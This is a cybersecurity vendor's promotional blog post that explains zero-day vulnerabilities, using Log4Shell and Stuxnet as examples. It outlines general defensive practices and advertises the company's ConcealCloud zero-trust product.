eBook
Harnessing the intelligence of AI, Conceal identifies emerging threats in real-time, ensuring you’re always a step ahead.
Unknown vulnerabilities discovered by adversaries are extremely harmful to organizations that have invested in the software with the zero day. When exploited, these vulnerabilities can cripple the victim organization until they are able to identify the vulnerability themself. Since zero-days are not defendable until after the attack has happened, threat actors that discover a zero day are able to cause extreme havoc in the industry.
Eight months ago the zero day, Log4J, sent security teams scrambling around the globe. Targeting the logging library found in many Java applications, the remote code execution vulnerability, CVE-2021-44228, targeted organizations by executing arbitrary code on a vulnerable host. Also known as Log4Shell, the vulnerability has been known for capitalizing on the logging library’s ubiquity and presence across a variety of services, websites, and applications throughout many industries. Log4J was seen in a variety of industries including resources, communications, media, technology, financial services, health and public service. According to a report released on July 11, the Cyber Safety Review Board (CSRB) labeled Log4J as an “endemic vulnerability”, meaning that vulnerable instances of Log4J are expected to linger for years or decades to come.
In June 2010, the computer worm Stuxnet was discovered in a planned takeover of an industrial control system in Iran. Often seen as the first digital weapon, Stuxnet was the first zero-day to cause physical destruction to equipment controlled by computers. Quickly, the world realized that viruses and worms were not contained to just harming computers or stealing information. While the Zero-Day was originally targeted to the Iranian uranium enrichment plant, it has since mutated and spread well beyond Iran, targeting other industrial and energy producing systems.
Complete prevention of a zero-day is impossible. The entire nature of a zero-day is the reality that the weakness is unknown by the rest of the world. As a result, it is nearly impossible to completely protect against something that a security team does not know exists. With this in mind, there are still security best practices that can limit the impact or success of a zero-day attack. For one, patch management is key to minimizing software vulnerabilities. While patch management cannot prevent a zero-day, minimizing exposure to a software makes it that much harder for a threat actor to identify and execute on a weakness. Implementing a detection capability, such as an antivirus software that is intelligence driven (NGAV), identifies potential malicious activity beyond known malware strains. Arguably even more important than preventing a zero day is the ability to successfully respond to a zero-day and minimize the impact. Ensuring an incident response plan is in place that can guide an organization through the response of an incident will minimize the attack’s impact as well as control the narrative around the event with the public.
At Conceal, we help organizations mitigate risk created by vulnerabilities and improve cyber hygiene. Through ConcealCloud, organizations are able to protect vulnerable systems and applications from attack on the internet, including zero days. The zero-trust hosting and access provided by ConcealCloud adds an extra layer of security between the organization’s network and the internet. By removing direct internet access to infrastructure, ConcealCloud eliminates the ability to remotely exploit critical flaws like those exposed from vulnerable software.